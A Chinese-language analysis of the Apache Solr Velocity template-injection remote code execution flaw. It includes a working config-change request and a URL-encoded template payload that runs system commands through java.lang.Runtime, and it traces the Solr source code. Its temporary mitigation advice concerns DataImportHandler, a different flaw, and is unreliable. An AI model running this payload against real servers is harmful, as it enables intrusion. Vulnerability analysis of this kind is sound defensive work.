Apache Solr Velocity 模板注入RCE漏洞分析

1、漏洞描述

由于Solr默认未开启登录认证，只需请求/节点名/config,将配置项params.resource.loader.enabled设置为true，再构造链接即可让Solr中的Velocity模版引擎渲染传入的恶意模版，造成命令执行。

2、影响版本

Apache Solr 5.x — Apache Solr 8.2.0

3、漏洞复现

测试版本： Solr 8.2

首先登录solr控制台，直接请求/节点名/config，修改配置项，Apache Solr默认集成VelocityResponseWriter插件，该插件初始化参数中的params.resource.loader.enabled默认值设置为false，但是可以通过POST请求直接修改配置项，将其设置为true。

{
      "update-queryresponsewriter": {
        "startup": "lazy",
        "name": "velocity",
        "class": "solr.VelocityResponseWriter",
        "template.base.dir": "",
        "solr.resource.loader.enabled": "true",
        "params.resource.loader.enabled": "true"
      }
}

接下来就可以构造一个自定义的Velocity模版，实现执行任意系统命令

select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

4、漏洞分析

首先从payload触发的漏洞链入手，在

/solr-8.2.0/solr/core/src/java/org/apache/solr/servlet/HttpSolrCall.java处responseWriter进行调试

跟进后，可以看到Solr是根据wt的参数值来确定数据的返回格式，也就是用Velocity来作为模板来渲染，如果模板的内容可控，我们就可以通过构造恶意模板来执行任意命令。

往下走，会进入到/solr-8.2.0/solr/core/src/java/org/apache/solr/response/QueryResponseWriterUtil.java的writeQueryResponse方法

继续跟进/solr-8.2.0/solr/core/src/java/org/apache/solr/response/VelocityResponseWriter.java中，因为payload中wt传入的参数是velocity，所以会创建对应的QueryResponseWriter的类型，为VelocityResponseWriter

跟进createEngine()方法，这里Solr首先会创建一个模板引擎对象engine

继续往下走，这里会判断VelocityResponseWriter插件的eparams.resource.loader.enabled选项是否为true。

跟进SolrParamResourceLoader()到/solr-8.2.0/solr/core/src/java/org/apache/solr/response/SolrParamResourceLoader.java文件中

如果ConfigAPI开启了params.resource.loader.enabled选项，就会从HTTP请求中获取参数，如模版名称。

它会解析我们传入的参数，并对v.template参数进行处理

解析了前端传来的所有参数，并对v.template.开头的参数进行处理，我们请求的参数为q=1&&wt=velocity&v.template=custom&v.template.custom=恶意模版内容

所以进入templates模版map的key是custom.vm，value就是我们指定的恶意模版内容

然后我们会重新回到/solr-8.2.0/solr/core/src/java/org/apache/solr/response/VelocityResponseWriter.java中的write()方法

不管wrapResponse是true或者false，最终都会被template.merge()，进行合并渲染，触发漏洞。

5、漏洞修复

将Apache Solr升级至最新版本

临时修补建议：

• 编辑solrconfig.xml，将所有用固定值配置的DataImportHandler用法中的dataConfig参数设置为空字符串。

• 确保网络设置只允许可信的流量与Solr进行通信，特别是与DIH请求处理程序的通信。

6、参考链接

• https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt
• http://gv7.me/articles/2019/apache-solr-velocity-rce-20191031/
• https://xz.aliyun.com/t/6700
• https://mp.weixin.qq.com/s/pPCNQoumpRvaUGkVxVvwBA